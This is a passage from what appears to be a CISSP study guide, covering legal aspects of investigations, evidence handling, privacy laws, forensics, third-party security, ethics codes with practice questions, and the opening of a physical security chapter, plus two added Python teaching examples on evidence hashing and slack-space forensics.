The final form of intellectual property that will be discussed is the concept of trade secrets. Trade secrets are business-proprietary information that is important to an organization's ability to compete. The organization must exercise due care and due diligence in the protection of their trade secrets. Some of the most common protection methods used are non-compete and non-disclosure agreements (NDA).
Import/export restrictions

Because strong cryptography is so effective, many nations have limited the import and/or export of cryptosystems and associated cryptographic hardware. In some cases, countries would prefer their citizens to not have access to cryptosystems that their intelligence agencies cannot crack and therefore attempt to impose import restrictions on cryptographic technologies.
During the Cold War, CoCom, the Coordinating Committee for Multilateral Export Controls, was a multinational agreement to not export certain technologies, which included encryption, to many communist countries. After the Cold War, the Wassenaar Arrangement became the standard for export controls. This multinational agreement was far less restrictive than the former CoCom, but did still suggest significant restrictions on the export of cryptographic algorithms and technologies to countries not included in the Wassenaar Arrangement.

LEGAL ASPECTS OF INVESTIGATIONS

Investigations are a critical way in which information security professionals come into contact with the law. Forensic and incident response personnel often conduct investigations, and both need to have a basic understanding of legal matters to ensure that the legal merits of the investigation are not unintentionally tarnished. Evidence, and the appropriate method for handling evidence, is a critical legal issue that all information security professionals must understand.
Evidence

Evidence is one of the most important legal concepts for information security professionals to understand. Information security professionals are commonly involved in investigations and often have to obtain or handle evidence during the investigation.

Crunch Time
Real evidence consists of tangible or physical objects. A knife or bloody glove might constitute real evidence in some traditional criminal proceedings. Direct evidence is testimony provided by a witness regarding what the witness actually experienced with her five senses. Circumstantial evidence is evidence that serves to establish the circumstances related to particular points or even other evidence. Corroborative evidence provides additional support for a fact that might have been called into question. Hearsay evidence constitutes second-hand evidence. As opposed to direct evidence, which someone has witnessed with her five senses, hearsay evidence involves indirect information. Secondary evidence consists of copies of original documents and oral descriptions. Computer-generated logs and documents might also constitute secondary rather than best evidence.

Best evidence rule

Courts prefer the best evidence possible. Original documents are preferred over copies; conclusive tangible objects are preferred over oral testimony. Recall that the five desirable criteria for evidence suggest that, where possible, evidence should be: relevant, authentic, accurate, complete, and convincing. The best evidence rule prefers evidence that meets these criteria.
Evidence integrity

Evidence must be reliable. It is common during forensic and incident response investigations to analyze digital media. It is critical to maintain the integrity of the data during the course of its acquisition and analysis. Cryptographic hashes (stronger than simple checksums) can demonstrate that no data changes occurred as a result of the acquisition and analysis: the hash of the original media is computed at acquisition, recomputed over the image, and recomputed again whenever the evidence changes hands. One-way hash functions such as MD5 or SHA-1 are commonly used for this purpose; because practical collisions are now known for both, many labs record a SHA-256 digest alongside them. Chain of custody requires that, once evidence is acquired, full documentation regarding who, what, when, and where evidence was handled be maintained.
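The hashing and chain-of-custody steps described above, as an added example (written for this edit, not code from the book or from (ISC)²): hash an image in chunks with more than one algorithm, re-verify it later, and keep an append-only custody log whose every entry carries the digests computed at that moment, so a later mismatch can be pinned to one handling step. The sample "image" is a constructed temp file; the evidence identifier, examiner names and locations are placeholders.

```python
"""Evidence integrity: chunked multi-algorithm hashing of a disk/memory image,
later re-verification, and a minimal chain-of-custody record (added example)."""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

CHUNK = 1024 * 1024  # 1 MiB reads, so a multi-GB image never has to fit in RAM


def hash_file(path, algorithms=("md5", "sha1", "sha256")):
    """Return {algorithm: hexdigest} for the file at `path`, read in chunks."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(CHUNK), b""):
            for h in hashers.values():
                h.update(block)
    return {name: h.hexdigest() for name, h in hashers.items()}


def verify_integrity(path, expected):
    """Recompute every recorded digest; True only if all of them still match.
    Pairing MD5/SHA-1 with SHA-256 means a forger would need a simultaneous
    collision in each algorithm, not just the weakest one."""
    current = hash_file(path, tuple(expected))
    return all(current[name] == digest for name, digest in expected.items())


class ChainOfCustody:
    """Append-only log of who handled the evidence, what they did, when, and
    where. Each entry stores the digests computed at that moment."""

    def __init__(self, evidence_id):
        self.evidence_id = evidence_id  # placeholder case/item identifier
        self.entries = []

    def record(self, path, who, action, where):
        entry = {
            "evidence_id": self.evidence_id,
            "who": who,
            "action": action,
            "where": where,
            "when": datetime.now(timezone.utc).isoformat(),
            "digests": hash_file(path),
        }
        self.entries.append(entry)
        return entry

    def unbroken(self):
        """True if every custody step recorded the same digests as the first."""
        if not self.entries:
            return True
        first = self.entries[0]["digests"]
        return all(e["digests"] == first for e in self.entries)

    def to_json(self):
        return json.dumps(self.entries, indent=2)


def write_sample_evidence(data=b"abc"):
    """Write constructed sample bytes to a temp file standing in for an image."""
    fd, path = tempfile.mkstemp(suffix=".dd")
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


if __name__ == "__main__":
    image = write_sample_evidence()
    log = ChainOfCustody("CASE-0001/HDD-1")          # placeholder identifier
    log.record(image, "examiner A", "acquired image", "lab bench 3")
    log.record(image, "examiner B", "checked out for analysis", "lab bench 1")
    print(log.to_json())
    print("chain intact:", log.unbroken())
```

Re-running `verify_integrity` against the digests stored in the first custody entry is the check to perform before any analysis step and before the evidence is presented; a single changed byte flips the result to False and `unbroken()` shows at which step the digests diverged.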
Entrapment and enticement

Entrapment is when law enforcement, or an agent of law enforcement, persuades someone to commit a crime when the person otherwise had no intention to commit a crime. Enticement could still involve agents of law enforcement making the conditions for commission of a crime favorable, but the difference is that the person is determined to have already broken a law or is intent on doing so.

PRIVACY, IMPORTANT LAWS, AND REGULATIONS

An entire book could easily be filled with discussions of both US and international laws that directly or indirectly pertain to issues in information security. This section is not an exhaustive review of these laws. Instead, only those laws that are represented on examination will be included in the discussion.
Privacy

One of the unfortunate side effects of the explosion of information systems over the past few decades is the loss of privacy. As more and more data about individuals is used and stored by information systems, the likelihood of that data being either inadvertently disclosed, sold to a third party, or intentionally compromised by a malicious insider or third party increases.
European Union privacy

The European Union has taken an aggressive pro-privacy stance while balancing the needs of business. Commerce would be impacted if member nations had different regulations regarding the collection and use of personally identifiable information. The EU Data Protection Directive (Directive 95/46/EC) allows for the free flow of information while still maintaining consistent protections of each member nation's citizens' data.

Fast Facts
The principles of the EU Data Protection Directive are:
- Notifying individuals how their personal data is collected and used
- Allowing individuals to opt out of sharing their personal data with third parties
- Requiring individuals to opt in to sharing the most sensitive personal data
- Providing reasonable protections for personal data

OECD privacy guidelines

The Organization for Economic Cooperation and Development (OECD), though often considered exclusively European, consists of more than 30 member nations from around the world. The members, in addition to prominent European countries, include such countries as the United States, Mexico, Australia, Japan, and the Czech Republic. The OECD provides a forum in which countries can focus on issues that impact the global economy. The OECD will routinely issue consensus recommendations that can serve as an impetus to change current policy and legislation in the OECD member countries and beyond.
In general, the OECD recommends the unfettered flow of information, albeit with notable legitimate exceptions to the free information flow. The most important exceptions to unfettered data transfer were identified in the Privacy and Transborder Flows of Personal Data guidelines. Five years after the privacy guidance, the OECD issued their Declaration on Transborder Data Flows, which further supported efforts to promote unimpeded data flows.
EU-US Safe Harbor

An interesting aspect of the EU Data Protection Directive is that the personal data of EU citizens may not be transmitted, even when permitted by the individual, to countries outside of the EU unless the receiving country is perceived by the EU to adequately protect their data. This presents a challenge regarding the sharing of the data with the United States, which is perceived to have less stringent privacy protections. To help resolve this issue, the United States and European Union created the safe harbor framework that gives US-based organizations the benefit of authorized data sharing. In order to be part of the safe harbor, US organizations must voluntarily consent to data privacy principles that are consistent with the EU Data Protection Directive.
US Privacy Act of 1974

All governments have a wealth of personally identifiable information on their citizens. The Privacy Act of 1974 was created to codify protection of US citizens' data that is being used by the federal government. The Privacy Act defined guidelines regarding how US citizens' personally identifiable information would be used, collected, and distributed. An additional protection was that the Privacy Act provides individuals with access to the data being maintained related to them, with some national security oriented exceptions.
US Computer Fraud and Abuse Act

Title 18 United States Code Section 1030, which is more commonly known as the Computer Fraud and Abuse Act (CFAA), was originally drafted in 1984 but still serves as an important piece of legislation related to the prosecution of computer crimes. The law has been amended numerous times, most notably by the USA PATRIOT Act.
The goal of the Computer Fraud and Abuse Act was to develop a means of deterring and prosecuting acts that damaged "federal interest computers" (a term later broadened by amendment to "protected computers"). A protected computer includes government, critical infrastructure, or financial processing systems; the definition also references computers engaging in interstate commerce. With the ubiquity of Internet-based commerce, this definition can be used to justify almost any Internet-connected computer as being a protected computer. The Computer Fraud and Abuse Act criminalized actions involving intentional attacks against protected computers that resulted in aggregate damages of $5000 in 1 year.
USA PATRIOT Act

The USA PATRIOT Act of 2001 was passed in response to the attacks in the United States that took place on September 11, 2001. The full title is "Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism Act," but it is often simply called the Patriot Act. The main thrust of the Patriot Act that applies to information security professionals addresses less stringent oversight of law enforcement regarding data collection. Wiretaps have become broader in scope. Searches and seizures can be done without immediate notification to the person whose data or property might be getting seized.

FORENSICS

Digital forensics provides a formal approach to dealing with investigations and evidence with special consideration of the legal aspects of this process. The forensic process must preserve the "crime scene" and the evidence in order to prevent unintentionally violating the integrity of either the data or the data's environment. A primary goal of forensics is to prevent unintentional modification of the system. Live forensics includes taking a bit-by-bit, or binary, image of physical memory, gathering details about running processes, and gathering network connection data; this volatile data must be captured while the system is still running, because it is lost once the system is powered off.
Forensic media analysis

In addition to the valuable data gathered during the live forensic capture, the main source of forensic data typically comes from binary images of secondary storage and portable storage devices such as hard disk drives, USB flash drives, CDs, DVDs, and possibly associated cellular phones and mp3 players.

Fast Facts
In order to understand the difference between a binary image and a normal backup, the investigator needs to understand the four types of data that exist.
- Allocated space: portions of a disk partition that are marked as actively containing data.
- Unallocated space: portions of a disk partition that do not contain active data. This includes space that has never been allocated and previously allocated space that has been marked unallocated. If a file is deleted, the portions of the disk that held the deleted file are marked as unallocated and available for use; the file's contents remain on the disk until they are overwritten.
- Slack space: data is stored in specific-size chunks known as clusters. A cluster is the minimum size that can be allocated by a file system. If a particular file, or the final portion of a file, does not require the use of the entire cluster, then some extra space will exist within the cluster. This leftover space is known as slack space: it may contain old data or can be used intentionally by attackers to hide information.
- Bad blocks/clusters/sectors: hard disks routinely end up with sectors that cannot be read due to a physical defect; these sectors are marked as bad and will be ignored by the operating system. Attackers could intentionally mark sectors or clusters as being bad in order to hide data within this portion of the disk.
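The allocated/unallocated/slack distinction above, as an added example (not code from the book): a toy cluster-based volume in Python in which a file that does not fill its last cluster leaves slack, a payload is hidden there, and a second file is deleted. A logical, file-level backup returns only the allocated bytes of live files, while a bit-for-bit image of the same media still yields the slack payload and the deleted file's content to a simple carve. The 4096-byte cluster size, the file names and all file contents are constructed assumptions; real file systems add metadata, fragmentation and wear leveling that this model leaves out.

```python
"""Toy cluster-based volume (constructed example, not a real file system) that
shows what a bit-for-bit image captures and a file-level backup does not:
slack space at the tail of a file and the contents of a deleted file."""
import math

CLUSTER = 4096  # assumed cluster size: the smallest unit the file system allocates


def clusters_needed(size):
    """Number of whole clusters a file of `size` bytes occupies."""
    return math.ceil(size / CLUSTER)


def slack_bytes(size, cluster=CLUSTER):
    """Unused bytes in the last cluster of a `size`-byte file (0 for an empty
    file or one that ends exactly on a cluster boundary)."""
    return 0 if size == 0 else (-size) % cluster


class ToyVolume:
    def __init__(self, n_clusters):
        self.image = bytearray(n_clusters * CLUSTER)  # the raw media
        self.allocated = [False] * n_clusters          # allocation bitmap
        self.files = {}                                 # name -> (first cluster, size)

    def write_file(self, name, data):
        """First-fit allocation of contiguous clusters; the data is copied in and
        the remainder of the last cluster is left untouched (that is the slack)."""
        if not data:
            raise ValueError("empty files are not modelled")
        n = clusters_needed(len(data))
        start = next(i for i in range(len(self.allocated) - n + 1)
                     if not any(self.allocated[i:i + n]))
        offset = start * CLUSTER
        self.image[offset:offset + len(data)] = data
        for i in range(start, start + n):
            self.allocated[i] = True
        self.files[name] = (start, len(data))

    def read_file(self, name):
        start, size = self.files[name]
        return bytes(self.image[start * CLUSTER:start * CLUSTER + size])

    def slack_region(self, name):
        """(start, end) offsets of the slack behind `name` on the raw media."""
        start, size = self.files[name]
        end_of_data = start * CLUSTER + size
        end_of_cluster = (start + clusters_needed(size)) * CLUSTER
        return end_of_data, end_of_cluster

    def hide_in_slack(self, name, payload):
        """What an attacker does: write into slack, invisible through the file API."""
        lo, hi = self.slack_region(name)
        if len(payload) > hi - lo:
            raise ValueError("payload larger than available slack")
        self.image[lo:lo + len(payload)] = payload

    def delete_file(self, name):
        """Deletion only clears the allocation bitmap; the bytes stay on the media."""
        start, size = self.files.pop(name)
        for i in range(start, start + clusters_needed(size)):
            self.allocated[i] = False

    def logical_backup(self):
        """What a normal backup sees: live files, allocated bytes only."""
        return {name: self.read_file(name) for name in self.files}

    def binary_image(self):
        """What a forensic acquisition sees: every byte of the media."""
        return bytes(self.image)


def carve(image, marker):
    """Offsets of every occurrence of `marker` in a raw image, ignoring allocation."""
    hits, pos = [], image.find(marker)
    while pos != -1:
        hits.append(pos)
        pos = image.find(marker, pos + 1)
    return hits


if __name__ == "__main__":
    vol = ToyVolume(8)
    vol.write_file("report.txt", b"A" * 5000)        # 2 clusters, 3192 bytes of slack
    vol.hide_in_slack("report.txt", b"HIDDEN-IN-SLACK")
    vol.write_file("notes.txt", b"deleted-notes-content")
    vol.delete_file("notes.txt")
    print("slack behind report.txt:", slack_bytes(5000), "bytes")
    print("logical backup holds:", list(vol.logical_backup()))
    img = vol.binary_image()
    print("slack payload found at:", carve(img, b"HIDDEN-IN-SLACK"))
    print("deleted file found at:", carve(img, b"deleted-notes-content"))
```

The logical backup contains only `report.txt` and none of the hidden payload, whereas carving the binary image finds the payload at offset 5000 (immediately after the file's last byte) and the deleted note at the start of cluster 2. That difference is exactly why a forensically sound acquisition must be a bit-for-bit image rather than a file copy.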

Network forensics

Network forensics is the study of data in motion, with special focus on gathering evidence via a process that will support admission into court. This means the integrity of the data is paramount, as is the legality of the collection process. Network forensics is closely related to network intrusion detection: the difference is the former is legal-focused and the latter is operations-focused.
Embedded device forensics

One of the greatest challenges facing the field of digital forensics is the proliferation of consumer-grade electronic hardware and embedded devices. While forensic investigators have had decades to understand and develop tools and techniques to analyze magnetic disks, newer technologies such as Solid State Drives (SSDs) lack both forensic understanding and forensic tools capable of analysis. SSD features such as wear leveling and TRIM (which lets the drive erase freed blocks on its own) mean that the unallocated-space recovery techniques developed for magnetic disks often fail on SSDs.

SECURITY AND THIRD PARTIES

Organizations are increasingly reliant upon third parties to provide significant and sometimes business-critical services. While leveraging external organizations is by no means a recent phenomenon, the criticality of the role and also the volume of services and products now typically warrant specific attention of an organization's information security department.
Service provider contractual security

Contracts are the primary control for ensuring security when dealing with third-party organizations providing services. The tremendous surge in outsourcing, especially the ongoing shift toward cloud services, has made contractual security measures much more prominent. While contractual language will vary, there are several common contracts or agreements that are used when attempting to ensure security when dealing with third-party organizations.
Service-Level Agreements

A common way of ensuring security is through the use of Service-Level Agreements or SLAs. The SLA identifies key expectations that the vendor is contractually required to meet. SLAs are widely used for general performance expectations but are increasingly leveraged for security purposes as well. SLAs primarily address availability.
Attestation

Information security attestation involves having a third-party organization review the practices of the service provider and make a statement about the security posture of the organization. The goal of the service provider is to provide evidence that they should be trusted. Typically, a third party provides attestation after performing an audit of the service provider against a known baseline.
Right to Penetration Test/Right to Audit

The Right to Penetration Test and Right to Audit documents provide the originating organization with written approval to perform their own testing or have a trusted provider perform the assessment on their behalf. Typically, there will be limitations on what the pen testers or auditors are allowed to use or target, but these should be clearly defined in advance.
Vendor governance

The goal of vendor governance is to ensure that the business is continually getting sufficient quality from its third-party providers. Professionals performing this function will often be employed at both the originating organization and the third party. Ultimately, the goal is to ensure that strategic partnerships between organizations continually provide the expected value.

ETHICS
Ethics is doing what is morally right. The Hippocratic Oath, taken by doctors, is an example of a code of ethics. Ethics is of paramount concern for information security professionals: we are often trusted with highly sensitive information, and our employers, clients, and customers must know that we will treat their information ethically.

The (ISC)² Code of Ethics

The (ISC)² Code of Ethics is the most testable code of ethics on the exam. That's fair: you cannot become a CISSP without agreeing to the Code of Ethics (among other steps); so it is reasonable to expect new CISSPs to understand what they are agreeing to. The (ISC)² Code of Ethics is available at the following Web site: http://www.isc2.org/ethics/default.aspx.
The (ISC)² Code of Ethics includes the preamble, canons, and guidance. The preamble is the introduction to the code. The canons are mandatory: you must follow them to become (and remain) a CISSP. The guidance is advisory (not mandatory): it provides supporting information for the canons.
The Code of Ethics preamble is quoted here: "Safety of the commonwealth, duty to our principals, and to each other requires that we adhere, and be seen to adhere, to the highest ethical standards of behavior. Therefore, strict adherence to this Code is a condition of certification." [1]

The (ISC)² Code of Ethics Canons in detail

The first, and therefore most important, canon of the (ISC)² Code of Ethics requires the information security professional to "protect society, the commonwealth, and the infrastructure." [2] The focus of the first canon is on the public and their understanding and faith in information systems. Security professionals are charged with the promoting of safe security practices and bettering the security of systems and infrastructure for the public good.
The second canon in the (ISC)² Code of Ethics charges information security professionals to "act honorably, honestly, justly, responsibly, and legally." [3] The (ISC)² Code of Ethics suggests that priority be given to the jurisdiction in which services are being provided. Another point made by this canon is related to providing prudent advice and cautioning the security professional from unnecessarily promoting fear, uncertainty, and doubt.
The (ISC)² Code of Ethics' third canon requires that security professionals "provide diligent and competent service to principals." [4] The focus of this canon is ensuring that the security professional provides quality service for which she is qualified and which maintains the value and confidentiality of information and the associated systems. An additional consideration is to ensure that the professional does not have a conflict of interest in providing quality services.
The fourth and final canon in the (ISC)² Code of Ethics mandates that information security professionals "advance and protect the profession." [5] This canon requires that the security professionals maintain their skills and advance the skills and knowledge of others. Also, this canon requires that individuals ensure not to negatively impact the security profession by associating in a professional fashion with those who might harm the profession.

Did You Know?
The (ISC)² Code of Ethics is highly testable, including applying the canons in order. You may be asked for the best ethical answer, when all answers are ethical, per the canons. In that case, choose the answer that is mentioned first in the canons. Also, the most ethical answer is usually the best: hold yourself to a very high ethical level on questions posed during the exam.

Computer Ethics Institute

The Computer Ethics Institute provides their Ten Commandments of Computer Ethics as a code of computer ethics. The code is both short and fairly straightforward. Both the name and format are reminiscent of the Ten Commandments of Judaism, Christianity, and Islam, but there is nothing overtly religious in nature about the Computer Ethics Institute's Ten Commandments. The Computer Ethics Institute's Ten Commandments of Computer Ethics are: [6]
1. Thou shalt not use a computer to harm other people.
2. Thou shalt not interfere with other people's computer work.
3. Thou shalt not snoop around in other people's computer files.
4. Thou shalt not use a computer to steal.
5. Thou shalt not use a computer to bear false witness.
6. Thou shalt not copy or use proprietary software for which you have not paid.
7. Thou shalt not use other people's computer resources without authorization or proper compensation.
8. Thou shalt not appropriate other people's intellectual output.
9. Thou shalt think about the social consequences of the program you are writing or the system you are designing.
10. Thou shalt always use a computer in ways that ensure consideration and respect for your fellow humans.

IAB's Ethics and the Internet

Much like the fundamental protocols of the Internet, the Internet Activities Board's (IAB) code of ethics, "Ethics and the Internet," is defined in an RFC document. RFC 1087, "Ethics and the Internet," was published in January 1989 to present a policy relating to ethical behavior associated with the Internet. [7] According to the IAB, the following practices would be considered unethical behavior if someone purposely:
- Seeks to gain unauthorized access to the resources of the Internet;
- Disrupts the intended use of the Internet;
- Wastes resources (people, capacity, computer) through such actions;
- Destroys the integrity of computer-based information;
- Compromises the privacy of users.

Summary of exam objectives

An understanding and appreciation of legal systems, concepts, and terms are required of an information security practitioner working in the information-centric world today. Maintaining the integrity of evidence, using hashing algorithms for digital evidence, and maintaining a provable chain of custody are vital.
Finally, the nature of information security and the inherent sensitivity therein make ethical frameworks an additional point requiring attention. This chapter presented the IAB's RFC on Ethics and the Internet, the Computer Ethics Institute's Ten Commandments of Computer Ethics, and the (ISC)² Code of Ethics. The CISSP exam will, no doubt, emphasize the Code of Ethics proffered by (ISC)², which presents an ordered set of four canons that attend to matters of the public, the individual's behavior, providing competent service, and the profession as a whole.

TOP FIVE TOUGHEST QUESTIONS

1. Without the _______ or some other separate agreement, the EU Data Protection Directive would cause challenges with sharing data with US entities due to the United States' perceived lesser concern for privacy.
A. US-EU Safe Harbor
B. EU Privacy Harbor doctrine
C. Identity Theft Enforcement and Restitution Act
D. US Federal Privacy Act
2. What can be used to make an exact replica of a hard disk drive as part of the evidence acquisition process?
A. Disk imaging software
B. Partition archival tool
C. Binary backup utility
D. Memory dumper
3. Which of the following defined protected computers and criminalized attacks against them?
A. Patriot Act
B. Computer Fraud and Abuse Act
C. ECPA
D. Identity Theft Enforcement and Restitution Act
4. Which canon of the (ISC)² Code of Ethics should be considered the most important?
A. Protect society, the commonwealth, and the infrastructure
B. Advance and protect the profession
C. Act honorably, honestly, justly, responsibly, and legally
D. Provide diligent and competent service to principals
5. Which principle requires that an organization's stakeholders act prudently in ensuring that the minimum safeguards are applied to the protection of corporate assets?
A. Due protection
B. Due process
C. Due diligence
D. Due care

ANSWERS
1. Correct answer and explanation: A. Answer A is correct; the US-EU Safe Harbor agreement provides a framework by which US companies can be considered safe for EU states and companies to share data with.
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are incorrect. The EU Privacy Harbor doctrine is simply a made-up answer choice. The other two options present legitimate US laws important to information security, but neither specifically addresses the issues regarding data sharing with the EU.
2. Correct answer and explanation: C. Answer C is correct; a binary backup utility is what is needed to ensure that every single bit on a hard drive is copied. Slack and unallocated space is needed for a forensically sound image.
Incorrect answers and explanations: A, B, and D. Answers A, B, and D are incorrect. The most viable, but incorrect, choice was A, disk imaging software. While some disk imaging software provides bit-by-bit backup capabilities, typical usage will only acquire allocated space. D, memory dumper, would apply to physical memory rather than a hard disk drive. B is just a made-up phrase that sounds legitimate.
3. Correct answer and explanation: B. Answer B is correct; the Computer Fraud and Abuse Act, penned in 1984, is still an important piece of legislation for the prosecution of computer crime. The Computer Fraud and Abuse Act defined protected computers, which were intended to be systems in which the federal government had a particular interest. The law set a bar of $5000 in damages during 1 year in order for the act to constitute a crime.
Incorrect answers and explanations: A, C, and D. Answers A, C, and D are incorrect. The Patriot Act lessened some of the restrictions on law enforcement related to electronic monitoring. ECPA is concerned with the wiretapping of electronic communications. The Identity Theft Enforcement and Restitution Act of 2008 amended the Computer Fraud and Abuse Act to make some of the considerations more modern.
4. Correct answer and explanation: A. Answer A is correct; to protect society, the commonwealth, and the infrastructure is the first canon and is thus the most important of the four canons of the (ISC)² Code of Ethics.
Incorrect answers and explanations: B, C, and D. Answers B, C, and D are incorrect. The canons of the (ISC)² Code of Ethics are presented in order of importance. The second canon requires the security professional to act honorably, honestly, justly, responsibly, and legally. The third mandates that professionals provide diligent and competent service to principals. The final, and therefore least important, canon wants professionals to advance and protect the profession.
5. Correct answer and explanation: D. Answer D is correct; due care provides a minimum standard of care that must be met. There are no explicit requirements that define what constitutes due care. Rather, due care requires acting in accord with what a prudent person would consider reasonable.
Incorrect answers and explanations: A, B, and C. Answers A, B, and C are incorrect. Due protection is a made-up phrase that has no legal standing. Due process is related to ensuring that defendants are treated fairly in legal proceedings with respect to their constitutional rights. Due diligence is the most closely related term to the correct answer, due care. However, due diligence has a focus on continually investigating business practices to ensure that due care is maintained.
Notes
1. (ISC)² Code of Ethics. Available from http://www.isc2.org/ethics/default.aspx [accessed May 22, 2013].
2. Ibid.
3. Ibid.
4. Ibid.
5. Ibid.
6. Computer Ethics Institute, 1992. Ten Commandments of Computer Ethics. Available from http://computerethicsinstitute.org/publications/tencommandments.html [accessed May 22, 2013].
7. Internet Activities Board, 1989. RFC 1087: Ethics and the Internet. Available from http://tools.ietf.org/html/rfc1087 [accessed May 22, 2013].

CHAPTER 10

Domain 10: Physical (Environmental) Security

Abstract
This chapter covers Domain 10 of the CISSP, Physical (Environmental) Security. The primary goal of this content is to ensure that the safety of personnel is a key consideration when considering physical and environmental security. To ensure this safety requires an understanding of common issues that could negatively impact personnel's safety, such as fire, smoke, flood, and toxins, with particular emphasis on smoke and fire detection and suppression. Physical security is the other main focus of this chapter and attention is given to physical access control matters including fences, gates, lights, cameras, locks, mantraps, and guards.

KEYWORDS
Mantrap; Bollard; Smart card; Tailgating; Degaussing; Destruction; Shredding; Montreal Accord (Montreal Protocol)

Exam Objectives in This Chapter

- Perimeter Defenses
- Site Selection, Design, and Configuration
- System Defenses
- Environmental Controls

Introduction

Physical (environmental) security protects the confidentiality and integrity of physical assets: people, buildings, systems, and data. The CISSP exam considers human safety as the most critical concern of this domain, which trumps all other concerns.

PERIMETER DEFENSES
Perimeter defenses help prevent, detect, and correct unauthorized physical access. Buildings, like networks, should employ defense in depth. Any one defense may fail, so critical assets should be protected by multiple physical security controls, such as fences, doors, walls, locks, etc. The ideal perimeter defense is safe, prevents unauthorized ingress, and, when applicable, offers both authentication and accountability.
Fences

Fences may range from simple deterrents (such as 3 ft/1 m tall fencing) to preventive devices, such as an 8 ft (2.4 m) tall fence with barbed wire on top. Fences should be designed to steer ingress and egress to controlled points, such as exterior doors and gates.
Gates

Gates range in strength from ornamental (a class I gate designed to deter access) to a class IV gate designed to prevent a car from crashing through (such as gates at airports and prisons). For more information, see ASTM International's ASTM F2200 "Standard Specification for Automated Vehicular Gate Construction" at http://www.astm.org/Standards/F2200.htm.

Fast Facts
Here are the four classes of gates:
- Class I: Residential (home use)
- Class II: Commercial/General Access (parking garage)
- Class III: Industrial/Limited Access (loading dock for 18-wheeler trucks)
- Class IV: Restricted Access (airport or prison)

Bollards

A traffic bollard is a strong post designed to stop a car. The term derives from the short, strong posts (called mooring bollards) used to tie ships to piers when docked.
Lights

Lights can act as both a detective and deterrent control. Light should be bright enough to illuminate the desired field of vision (the area being protected). Types of lights include Fresnel lights; these are the same type of lights originally used in lighthouses, which used Fresnel lenses to aim light in a specific direction.
Light measurement terms include lumen, the unit of luminous flux (roughly the amount of light one candle creates). Light was historically measured in foot-candles; one foot-candle is one lumen per square foot. Lux, based on the metric system, is more commonly used now: one lux is one lumen per square meter, so one foot-candle is roughly 10.76 lux.
CCTV

Closed Circuit Television (CCTV) is a detective device used to aid guards in detecting the presence of intruders in restricted areas. CCTVs using the normal light spectrum require sufficient visibility to illuminate the field of view that is visible to the camera. Infrared devices can "see in the dark" by displaying heat. Older "tube cameras" are analog devices. Modern cameras use CCD (Charge-Coupled Device) sensors, which are digital.
CCTV cameras may also have other typical camera features such as pan and tilt (moving horizontally and vertically).
Magnetic tape such as VHS is used to record images from tube cameras. CCD cameras record to a DVR (Digital Video Recorder) or NVR (Network Video Recorder).
Locks

Locks are a preventive physical security control, used on doors and windows to prevent unauthorized physical access. Locks may be mechanical, such as key locks or combination locks, or electronic, which are often used with smart cards or magnetic stripe cards.
Key locks

Key locks require a physical key to unlock. Keys may be shared or sometimes copied, which lowers the accountability of key locks. A common type is the pin tumbler lock, which has two sets of pins: driver pins and key pins. The correct key makes the pins line up with the shear line, allowing the lock tumbler (plug) to turn.
Ward or warded locks must turn a key through channels (called wards); a skeleton key is designed to open varieties of warded locks.
Combination locks

Combination locks have dials that must be turned to specific numbers, in a specific order (alternating clockwise and counterclockwise turns) to unlock. Button or keypad locks also use numeric combinations. Limited accountability due to shared combinations is the primary security issue concerning these types of locks.
Smart cards and magnetic stripe cards

A smart card is a physical access control device that is often used for electronic locks, credit card purchases, or dual-factor authentication systems. "Smart" means the card contains a computer circuit.
Smart cards may be "contact" or "contactless." Contact cards must be inserted into a smart card reader, while contactless cards are read wirelessly. One type of contactless card technology is Radio Frequency Identification (RFID). These cards contain RFID tags (also called transponders) that are read by RFID transceivers.
A magnetic stripe card contains a magnetic stripe that stores information. Unlike smart cards, magnetic stripe cards are passive devices that contain no circuits. These cards are sometimes called swipe cards: they are used by swiping through a card reader.
Tailgating/piggybacking

Tailgating (also known as piggybacking) occurs when an unauthorized person follows an authorized person into a building after the authorized person unlocks and opens the door. Policy should forbid employees from allowing tailgating and security awareness efforts should describe this risk.
Mantraps and turnstiles

A mantrap is a preventive physical control with two doors. The first door must close and lock before the second door may be opened. Each door typically requires a separate form of authentication to open. The intruder is trapped between the doors after entering the mantrap.
Turnstiles are designed to prevent tailgating by enforcing a "one person per authentication" rule, just as they do in subway systems.
Contraband checks

Contraband checks seek to identify objects that are prohibited from entering a secure area. These checks are often used to detect metals, weapons, or explosives. Contraband checks are casually thought to be a detective control, but their presence being known makes them also a deterrent to actual threats.
Motion detectors and other perimeter alarms

Ultrasonic and microwave motion detectors work like Doppler radar used to predict the weather. A wave of energy is sent out, and the echo is returned when it bounces off an object. The echo will be returned more quickly when a new object (such as a person walking in range of the sensor) reflects the wave.
A photoelectric motion sensor sends a beam of light across a monitored space to a photoelectric sensor. The sensor alerts when the light beam is broken.
Ultrasonic, microwave, and infrared motion sensors are active sensors, which means they actively send energy. A passive sensor can be thought of as a "read-only" device. An example is a passive infrared (PIR) sensor, which detects infrared energy created by body heat.
Doors and windows

Always consider the relative strengths and weaknesses of doors, windows, walls, floors, ceilings, etc. All should be equally strong from a defensive standpoint: attackers will target the weakest link in the chain and should not find a weak spot to exploit.
Egress must be unimpeded in case of emergency, so a simple push button or motion detectors are frequently used to allow egress. Externally facing emergency doors should be marked for emergency use only and equipped with panic bars. The use of a panic bar should trigger an alarm.
Glass windows are structurally weak and can be dangerous when shattered. Bulletproof or explosive-resistant glass can be used for secured areas. Wire mesh or security film can lower the danger of shattered glass and provide additional strength. Alternatives to glass windows include polycarbonate such as Lexan and acrylic such as Plexiglass.
Walls, floors, and ceilings

Walls around any internal secure perimeter such as a data center should be "slab to slab," meaning they should start at the floor slab and run to the ceiling slab. Raised floors and drop ceilings can obscure where the walls truly start and stop. An attacker should not be able to crawl under a wall that stops at the top of the raised floor or climb over a wall that stops at the drop ceiling.
Guards

Guards are a dynamic control that may be used in a variety of situations. Guards may aid in inspection of access credentials, monitor CCTVs, monitor environmental controls, respond to incidents, act as a deterrent (all things being equal, criminals are more likely to target an unguarded building over a guarded building), and much more.
Professional guards have attended advanced training and/or schooling; amateur guards (sometimes derogatively called "Mall Cops") have not. The term "pseudo guard" means an unarmed security guard.
Dogs

Dogs provide perimeter defense duties, guarding a rigid "turf." They are often used in controlled areas, such as between the exterior building wall and a perimeter fence. The primary drawback to using dogs as a perimeter control is legal liability.

